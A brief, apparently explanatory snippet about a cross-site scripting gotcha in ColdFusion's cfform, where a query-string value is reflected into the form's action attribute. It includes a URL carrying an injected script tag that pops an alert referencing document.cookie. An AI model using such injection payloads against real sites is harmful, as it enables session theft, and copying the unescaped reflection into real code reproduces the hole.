Cross Site Scripting (CSS/XSS) Gotcha when using cfform

cfrender.cfm

<form action="/this/folder/path/index.cfm?SumNum=1594481679" name="thisform" method="post"> 

index.cfm

/this/folder/path/index.cfm?SumNum="</div>
<script>alert('document.cookie')</script> 

querystring.cfm

/this/folder/path/index.cfm?SumNum=1594481679

thisform.cfm

<cfform name="thisform" method="post">  
   <cfinput ...... />  
</cfform>